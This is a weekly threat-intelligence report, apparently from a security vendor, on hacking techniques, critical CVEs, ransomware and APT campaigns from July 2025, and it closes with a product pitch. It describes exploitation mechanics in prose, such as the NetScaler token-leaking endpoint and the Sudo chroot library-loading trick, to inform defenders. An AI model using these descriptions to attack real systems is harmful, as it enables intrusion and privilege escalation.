Weekly Report: New Hacking Techniques and Critical CVEs July 2-10, 2025

The week of July 2-10, 2025 witnessed significant escalation in cybersecurity threats with multiple critical incidents affecting major organizations globally. The period was marked by sophisticated ransomware attacks targeting critical infrastructure, critical zero-day vulnerabilities under active exploitation, and emergence of new APT campaigns targeting government entities.

Key developments include the SafePay ransomware attack on global IT distributor Ingram Micro, the massive Qantas Airlines data breach affecting 5.7 million customers, and the disclosure of multiple critical vulnerabilities including CitrixBleed 2 (CVE-2025-5777) and critical Sudo flaws affecting Linux systems. The week also saw continued Microsoft Patch Tuesday releases addressing 137 vulnerabilities and sophisticated APT campaigns by Iranian and Chinese threat actors.

>>Outpace Attackers With AI-Based Automated Penetration Testing

New Hacking Techniques 

1. ClickFix Social Engineering Evolution

Date of Major Surge: July 2025

Overview

The ClickFix social engineering technique experienced a dramatic 517% surge in the first half of 2025, becoming the second most common attack vector behind only phishing. This technique has evolved beyond simple clipboard hijacking to sophisticated multi-stage campaigns targeting government and corporate entities.

Technical Evolution

The ClickFix technique has evolved to include:

• Pastejacking Integration: Malicious clipboard hijacking automatically inserts PowerShell commands
• Multi-Platform Targeting: Attacks now affect Windows, Linux, and macOS systems
• Nation-State Adoption: APT groups including APT28 (Russia), MuddyWater (Iran), and North Korean actors have incorporated ClickFix into their operations
• Fake CAPTCHA Integration: Advanced social engineering using legitimate-looking verification prompts

Attack Methodology

Recent campaigns demonstrate sophisticated targeting:

1. Lure Creation: Spoofed government websites and document verification portals
2. Clipboard Manipulation: Invisible Unicode characters used to hide malicious commands
3. Multi-Stage Deployment: NetSupport RAT, Latrodectus, and Lumma Stealer deployment
4. Persistence: Registry modifications and advanced evasion techniques

Impact Assessment

Singapore’s Cyber Security Agency issued active alerts on July 10, 2025, warning of ongoing campaigns targeting technology, financial services, manufacturing, and government sectors. The technique bypasses traditional security controls by relying on user execution rather than exploit delivery.

2. Attachment Hijacking Technique

Date of Observation: July 2025

Overview

IBM X-Force identified a new technique dubbed “attachment hijacking” being used by threat actors to weaponize legitimate invoice-related emails. This technique represents an evolution in email-based social engineering attacks.

Technical Methodology

The technique involves:

• Email Thread Hijacking: Attackers insert malicious content into legitimate email conversations
• Invoice Impersonation: Exploitation of business financial processes
• Contextual Legitimacy: Use of existing email threads to bypass suspicion
• Multi-Stage Payload Delivery: Progressive compromise through seemingly legitimate attachments

Operational Impact

The technique has been observed in:

• Business Email Compromise (BEC) campaigns
• Financial fraud operations
• Supply chain infiltration attempts
• Credential harvesting operations

3. Multi-Platform Attack Orchestration

Date of Observation: July 2025

Overview

Advanced Persistent Threat groups have evolved to coordinate attacks across multiple platforms simultaneously, as demonstrated by Silver Fox APT targeting Taiwan with trojaned medical software and AI tools.

Technical Innovation

Multi-platform orchestration includes:

• Cross-Platform Payloads: Single attack campaigns targeting Windows, Linux, and mobile platforms
• Supply Chain Integration: Compromise of software distribution channels
• Cloud Storage Exploitation: Use of legitimate cloud services for payload hosting
• Anti-Analysis Evasion: Platform-specific obfuscation and sandbox detection

Strategic Targeting

The approach demonstrates:

• Healthcare Sector Focus: Trojaned medical software (Philips DICOM Viewer)
• AI Tool Compromise: Backdoored AI applications and Chrome extensions
• Government Impersonation: Fake National Taxation Bureau communications
• Infrastructure Targeting: Telecommunications and critical infrastructure compromise
  

4. Browser-in-the-Browser (BitB) Attack Evolution

Date of Continued Evolution: July 2025

Overview

Browser-in-the-Browser attacks have evolved beyond simple popup windows to sophisticated multi-stage campaigns targeting government and financial institutions.

Technical Advancement

Modern BitB attacks include:

• Full-Screen Exploitation: Mandatory full-screen modes hiding legitimate browser elements
• Government Impersonation: Fake ministry and government website interfaces
• SSO Exploitation: Advanced Single Sign-On impersonation techniques
• Multi-Browser Targeting: Cross-platform browser exploitation capabilities

Operational Sophistication

Current campaigns demonstrate:

• Legitimate Website Hosting: Use of compromised legitimate sites for hosting
• Dynamic Content Generation: Real-time adaptation to victim behavior
• Credential Harvesting: Advanced form handling and data exfiltration
• Persistence Mechanisms: Browser extension installation and configuration manipulation

Critical Zero-Day Vulnerabilities and Exploits

CVE-2025-5777: CitrixBleed 2 – Critical NetScaler Vulnerability

Date of Active Exploitation: Mid-June 2025 (disclosed July 2025)

Overview

A critical vulnerability in Citrix NetScaler ADC and NetScaler Gateway, dubbed CitrixBleed 2, has been under active exploitation since mid-June 2025. The vulnerability allows remote, unauthenticated attackers to extract valid session tokens from vulnerable NetScaler instances.

Deep Technical Analysis

CVE-2025-5777 is an out-of-bounds memory read vulnerability (CVSS 9.3) stemming from insufficient input validation. The flaw allows attackers to:

• Extract valid session tokens from memory through repeated login requests
• Bypass multi-factor authentication mechanisms
• Hijack active user sessions including administrative accounts
• Access both user and administrative management interfaces

Exploitation Mechanics

Attackers exploit the vulnerability by repeatedly sending modified login requests to the /p/u/doAuthentication.do endpoint. Each request leaks limited memory data, but with sufficient attempts, attackers can extract valuable session tokens, including “nsroot” administrative tokens.

Impact Assessment

Security researchers report attacks spanning back to July 1, 2025, with one attacking IP address previously linked to RansomHub ransomware group. The vulnerability has enabled:

• Session hijacking bypassing MFA
• Administrative account compromise
• Potential ransomware deployment
• Extended network infiltration

CISO Takeaways

Organizations must immediately audit all NetScaler deployments for compromise indicators, even if patches were applied quickly. The active exploitation timeline suggests widespread scanning and potential breaches across vulnerable installations. Implement additional monitoring for authentication anomalies and consider temporary access restrictions while conducting forensic analysis.

Critical Sudo Vulnerabilities: CVE-2025-32462 and CVE-2025-32463

Date of Disclosure: July 4, 2025

Overview

Two critical vulnerabilities in the Sudo command-line utility affect all major Linux distributions, allowing local attackers to escalate privileges to root access. The flaws impact Sudo versions before 1.9.17p1.

Technical Analysis

CVE-2025-32462 (CVSS 2.8) – A 12-year-old vulnerability in Sudo’s host option that allows privilege escalation when specific host-based configurations are used. The flaw affects shared sudoers files common in enterprise environments.

CVE-2025-32463 (CVSS 9.3) – A critical chroot option vulnerability allowing any local user to gain root privileges by exploiting malicious /etc/nsswitch.conf files within user-controlled directories. This vulnerability affects default Sudo configurations.

Exploitation Scenarios

CVE-2025-32463 enables unprivileged users to:

• Create fake nsswitch.conf files in chroot directories
• Trick Sudo into loading malicious shared libraries
• Achieve full root access without requiring sudoers file entries
• Bypass all existing privilege restrictions

Impact Assessment

The vulnerabilities affect major Linux distributions including Ubuntu, Red Hat, Debian, and AlmaLinux. CVE-2025-32463 is particularly dangerous as it affects default configurations and requires no pre-existing sudo privileges.

CISO Takeaways

Immediate patching to Sudo version 1.9.17p1 is critical, especially for internet-facing and multi-user systems. Organizations should audit sudoers configurations and implement additional monitoring for unusual privilege escalation attempts. The age of CVE-2025-32462 suggests potential long-term compromise in environments with vulnerable configurations.

Major Ransomware and Data Breach Incidents

Ingram Micro SafePay Ransomware Attack

Date of Attack: July 3-4, 2025

Overview

Global IT distributor Ingram Micro, reporting $48 billion in annual sales, suffered a significant SafePay ransomware attack during the July 4th holiday weekend, disrupting operations worldwide.

Technical Analysis

The attack demonstrates sophisticated pre-positioning and timing:

Attack Vector: Exploitation of GlobalProtect VPN platform through compromised credentials

Impact Scope:

• Complete website and ordering system shutdown
• Xvantage distribution platform offline
• Impulse license provisioning system compromised
• Employee work-from-home mandates across multiple locations

SafePay Ransomware Profile

SafePay represents a relatively new but highly active ransomware operation:

• First observed: November 2024
• Victim count: Over 220 organizations
• Average data theft: 111GB per victim
• Notable previous targets: Conduent (government contractor), Microlise (British tech), Marlboro-Chesterfield Pathology (236,000 patient records)

Recovery Operations

Ingram Micro’s response included:

• Company-wide password and MFA resets
• Gradual VPN access restoration
• Phased system recovery beginning July 8, 2025
• Enhanced monitoring and security measures implementation

CISO Takeaways

The attack highlights vulnerabilities in VPN infrastructure during holiday periods when security staffing may be reduced. Organizations should implement enhanced monitoring during low-staffing periods and ensure robust backup systems for critical business operations. The rapid response and recovery efforts demonstrate the importance of pre-planned incident response procedures.

Qantas Airlines Data Breach

Date of Incident: June 30, 2025 (within scope as disclosed July 2, 2025)

Overview

Qantas Airways disclosed a massive data breach affecting 5.7 million customers after attackers compromised a third-party customer service platform used by an offshore call center.

Technical Impact Assessment

Affected Customer Data:

• 2.8 million records: Names, email addresses, frequent flyer numbers
• 1.2 million records: Names and email addresses only
• 1.7 million records: Comprehensive data including addresses, birthdates, phone numbers, meal preferences

Attack Methodology

The breach demonstrates sophisticated targeting of third-party service providers:

• Compromise of offshore call center systems
• Access to customer service platform containing historical data
• Potential use of vishing and pretexting tactics (attributed to Scattered Spider group)

Response Timeline

• June 30, 2025: Breach detection and containment
• July 2, 2025: Public disclosure
• July 7, 2025: Contact from alleged attackers
• July 9, 2025: Detailed customer impact assessment released

CISO Takeaways

The incident underscores critical third-party risk management challenges. Organizations must implement robust vendor security assessments and continuous monitoring of third-party access to sensitive data. The rapid detection and containment demonstrate effective incident response capabilities, while the extended impact assessment timeline reflects the complexity of modern data environments.

Advanced Persistent Threat Campaigns

BladedFeline APT Targets Iraqi and Kurdish Officials

Date Range: June-July 2025 operations

Overview

Iran-aligned APT group BladedFeline, assessed with medium confidence to be a sub-cluster of OilRig, continued sophisticated cyberespionage operations targeting Iraqi and Kurdish government officials with an evolved toolkit.

Technical Arsenal Evolution

Whisper Backdoor: Novel C#/.NET backdoor that:

• Infiltrates Microsoft Exchange servers via compromised webmail accounts
• Uses email attachments for covert C2 communication
• Implements inbox rules for message filtering
• Executes PowerShell scripts and file manipulation commands

PrimeCache IIS Module: Malicious web server component that:

• Functions as passive backdoor in IIS environments
• Shares code similarities with OilRig’s RDAT backdoor
• Provides persistent access through web server infrastructure

Targeting and Impact

BladedFeline has maintained access to target networks since 2017, demonstrating:

• Long-term persistence in government networks
• Expansion to telecommunications infrastructure (Uzbekistan provider)
• Continuous tool development and operational security improvements
• Strategic intelligence collection aligned with Iranian geopolitical interests

CISO Takeaways

The eight-year persistence timeline demonstrates the challenge of detecting sophisticated nation-state actors. Organizations should implement comprehensive logging across email and web server infrastructure, conduct regular threat hunting exercises, and maintain robust network segmentation to limit lateral movement capabilities.

Silver Fox APT Taiwan Campaign Enhancement

Date Range: Ongoing through July 2025

Overview

Chinese state-sponsored Silver Fox APT (also known as Void Arachne) expanded operations targeting Taiwanese organizations with sophisticated multi-stage malware campaigns using trojanized medical software.

Advanced Attack Methodology

Initial Access Vectors:

• SEO poisoning targeting medical software searches
• Trojanized Philips DICOM Viewer (MediaViewerLauncher.exe)
• Phishing emails impersonating National Taxation Bureau
• Backdoored installers for Chrome, VPN clients, and AI tools

Technical Innovation:

• Alibaba Cloud Object Storage for payload hosting
• Anti-VM and sandbox evasion techniques
• TrueSightKiller vulnerable driver for AV bypass
• Multi-stage encryption and obfuscation
• ValleyRAT/Winos 4.0 final payload deployment

Strategic Targeting

Silver Fox demonstrates sophisticated understanding of target environments:

• Healthcare delivery organizations (HDOs)
• Government sector entities
• Critical infrastructure components
• Telecommunications networks

CISO Takeaways

The medical software trojanization represents a concerning evolution in supply chain attacks targeting critical infrastructure. Healthcare organizations should implement enhanced verification procedures for medical software, monitor for unauthorized cloud storage access, and deploy behavioral analytics to detect multi-stage attack progressions.

Critical Vulnerability Disclosures

ServiceNow Count(er) Strike (CVE-2025-3648)

Date of Disclosure: July 8, 2025

Overview

Varonis Threat Labs disclosed a high-severity data inference vulnerability in ServiceNow’s platform that enables unauthorized access to sensitive data through misconfigured ACLs.

Technical Analysis

CVE-2025-3648 (CVSS 8.2) exploits the record count UI element on list pages to:

• Infer sensitive data from restricted tables
• Bypass access control mechanisms
• Extract PII, credentials, and configuration data
• Impact hundreds of ServiceNow tables across instances

Exploitation Requirements

The vulnerability requires only:

• Minimal table access permissions
• Knowledge of table enumeration techniques
• Ability to craft range query requests
• Understanding of conditional ACL configurations

Impact Scope

The flaw potentially affects:

• All ServiceNow instances prior to May 2025 updates
• Fortune 500 organizations (85% of ServiceNow customer base)
• Government and healthcare ServiceNow deployments
• Custom and standard table configurations

CISO Takeaways

Organizations using ServiceNow should immediately review ACL configurations, implement Query ACLs and Security Data Filters, and audit custom table permissions. The vulnerability’s simplicity combined with ServiceNow’s widespread adoption makes it a significant concern for enterprise security.

TeleMessage TM SGNL Critical Flaws

Date of KEV Addition: July 2, 2025

Overview

CISA added two actively exploited TeleMessage vulnerabilities to the Known Exploited Vulnerabilities catalog, with federal agencies required to remediate by July 22, 2025.

Vulnerability Details

CVE-2025-48927: Spring Boot Actuator misconfiguration exposing /heapdump endpoint enabling memory dump downloads and privilege escalation

CVE-2025-48928: JSP application core dump exposure allowing password extraction from HTTP traffic included in heap dumps

Strategic Significance

TeleMessage’s use by government officials, including Secret Service members, amplifies the security implications:

• Over 60 U.S. government users affected
• Metadata and chat logs exposed on Distributed Denial of Secrets
• Trump administration officials previously used the platform
• Regulatory compliance implications for government communications

CISO Takeaways

The incident highlights risks in government communication platforms and the importance of security-by-design principles. Organizations should audit messaging platform configurations, implement secure development practices, and maintain strict access controls for sensitive communication systems.

Ransomware Ecosystem Evolution

H1 2025 Statistical Analysis

Recent intelligence reveals significant ransomware landscape changes:

Key Metrics:

• 3,627 total attacks (47% increase from H1 2024)
• 445 confirmed attacks affecting 17+ million records
• Average ransom demand: $1.6 million
• Government targets: 60% increase
• Educational institutions: 23% increase

Leading Ransomware Groups:

• Akira: 347 victims (most prolific)
• Qilin: 318 victims (maintaining market position)
• RansomHub: 222 victims (emerging threat)
• SafePay: 186 victims (rapid growth since November 2024)

CISO Takeaways

The significant increase in government and educational targeting reflects evolving ransomware strategies. Organizations should enhance backup and recovery capabilities, implement behavioral analytics for early detection, and maintain robust incident response procedures.

Underground Threat Intelligence

Dark Web Market Fragmentation

Current intelligence indicates continued fragmentation of cybercrime ecosystems:

Market Dynamics:

• Increased law enforcement pressure causing group dispersal
• Evolution toward encryption-less extortion models
• Enhanced anonymity through I2P network adoption
• Expansion of AI-powered attack tool development

Notable Developments:

• Hunters International rebranding to “World Leaks”
• Pay2Key.I2P Iranian ransomware group resurgence
• Cryptocurrency exchange data trading increases
• Enhanced social engineering through deepfake technology

CISO Takeaways

The fragmentation of traditional cybercrime markets creates unpredictable threat landscapes. Organizations should maintain flexible threat intelligence programs and prepare for novel attack vectors emerging from underground innovation.

Outpace Attackers With AI-Based Automate Penetration Testing With FireCompass:

FireCompass is a single platform for AI-Powered Continuous Automated Red Teaming (CART), Pen Testing & NextGen Attack Surface Management
FireCompass Free Trial